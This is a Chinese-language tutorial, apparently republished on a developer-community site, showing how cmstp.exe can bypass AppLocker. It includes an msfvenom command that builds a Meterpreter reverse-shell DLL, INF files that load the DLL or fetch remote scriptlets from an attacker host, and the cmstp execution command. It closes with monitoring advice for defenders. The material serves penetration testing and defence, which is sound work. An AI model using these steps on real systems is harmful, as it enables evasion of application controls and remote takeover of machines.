AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

利用CMSTP绕过AppLocker并执行代码

2018-05-23 2182
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

CMSTP是与Microsoft连接管理器配置文件安装程序关联的二进制文件。它接受INF文件,这些文件可以通过恶意命令武器化,以脚本(SCT)和DLL的形式执行任意代码。它是位于以下两个Windows目录中的受信任的Microsoft二进制文件。

· C:\Windows\System32\cmstp.exe

· C:\Windows\SysWOW64\cmstp.exe

AppLocker默认规则允许在这些文件夹中执行二进制文件,因此它可以用作绕过方法。最初Oddvar Moe发现可以使用这个CMSTP文件绕过AppLocker和UAC,并在他的博客上发表他的研究成果!

DLL

Metasploit Framework可用于通过msfvenom生成恶意DLL文件。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll>/root/Desktop/pentestlab.dll

利用CMSTP绕过AppLocker并执行代码

Metasploit – DLL生成

INF文件的RegisterOCXSection需要包含恶意DLL文件的本地路径或远程执行的WebDAV位置。

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

利用CMSTP绕过AppLocker并执行代码

CMSTP – 本地DLL执行

Metasploit multi / handler模块需要配置为接收请求。

利用CMSTP绕过AppLocker并执行代码

CMSTP – Metasploit多处理程序

当恶意INF文件与cmstp一起提供时,代码将在后台执行。

cmstp.exe /s cmstp.inf

利用CMSTP绕过AppLocker并执行代码

CMSTP – INF在本地执行

Meterpreter会话将从DLL执行中打开。

利用CMSTP绕过AppLocker并执行代码

CMSTP – 通过DLL执行的Meterpreter

SCT

除了DLL文件外,cmstp还能够运行SCT文件,这些文件在红队运行期间扩展了此二进制文件的可用性。Nick Tyrer最初通过推特展示了这种能力。

Nick Tyrer还编写了一个名为powersct.sct的scriptlet ,可以将其用作执行PowerShell命令的备选解决方案,以防本机PowerShell被阻止。该UnRegisterOCXSection需要包含小脚本的URL。最终的INF文件需要包含以下内容:

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

当INF文件将执行一个新的窗口将打开,这将允许用户执行PowerShell命令。

cmstp.exe /s cmstp.inf

利用CMSTP绕过AppLocker并执行代码

CMSTP – PowerShell

代码执行也可以通过使用scriptlet来调用恶意可执行文件。INF文件需要包含scriptlet的远程位置。

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/pentestlab.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

利用CMSTP绕过AppLocker并执行代码

CMSTP – SCT执行

在执行INF文件时,将会打开一个新的命令提示符窗口,这将表示代码已成功执行。

利用CMSTP绕过AppLocker并执行代码

CMSTP – 使用Scriptlet执行INF

Meterpreter获取到shell。

利用CMSTP绕过AppLocker并执行代码

CMSTP – Meterpreter通过SCT执行

结论

CMSTP需要INF文件并在执行时生成一个CMP文件,它是连接管理器设置文件。这两个文件实际上都是文本文件,不太可能触发任何警报。因此,如果攻击者已经开始使用此技术,cmstp.exe二进制文件无法被AppLocker规则阻止,则需要对这两个文件进行监视。

利用CMSTP绕过AppLocker并执行代码

CMSTP – INF和CMP文件


原文发布时间为:2018-05-23

本文来自云栖社区合作伙伴“嘶吼网”,了解相关信息可以关注“嘶吼网”。


文章标签:
Windows
Shell
技术小能手
目录
相关文章
游客qsxez56gggwqy
|
1月前
|
SQL 安全 Linux
命令执行漏洞
命令执行漏洞
游客qsxez56gggwqy
55 0
Shadow_143
|
4月前
|
安全 Unix Shell
web安全之命令执行
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令来执行。
Shadow_143
56 4
潇湘信安
|
安全 API 网络安全
绕过IIS命令执行防护提权
绕过IIS命令执行防护提权
潇湘信安
151 0
轩公子谈技术
|
安全 Linux Windows
WEB漏洞-RCE代码及命令执行漏洞
WEB漏洞-RCE代码及命令执行漏洞
轩公子谈技术
168 0
随风kali
|
安全 Shell PHP
干货 | 命令执行(RCE)面对各种过滤,骚姿势绕过总结
干货 | 命令执行(RCE)面对各种过滤,骚姿势绕过总结
随风kali
1047 0
游客az7yd3cqma4aw
|
移动开发 监控 安全
命令执行漏洞小结(上)
命令执行漏洞小结
游客az7yd3cqma4aw
202 0
命令执行漏洞小结(上)
贤鱼不闲
|
安全 Linux 开发工具
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
>🍀1复习一下以前的内容 >🍀2总结整合一下过滤方法
贤鱼不闲
246 0
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
游客mgyx2kmo6h5zo
|
安全 网络协议 Java
命令执行漏洞详细讲解
应用有时需要调用一些执行系统命令的函数,如PHP中的`system`、`exec`、`shell_exec`、`passthru`、`popen`、`proc_popen`等,当用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。
游客mgyx2kmo6h5zo
421 0
技术小甜
|
安全 Windows
映象劫持使部分程序不可运行的解决方法
技术小甜
1008 0
行者武松
|
安全 测试技术 C#
如何使用PowerShell实现命令控制以及安全检查绕过
行者武松
1515 0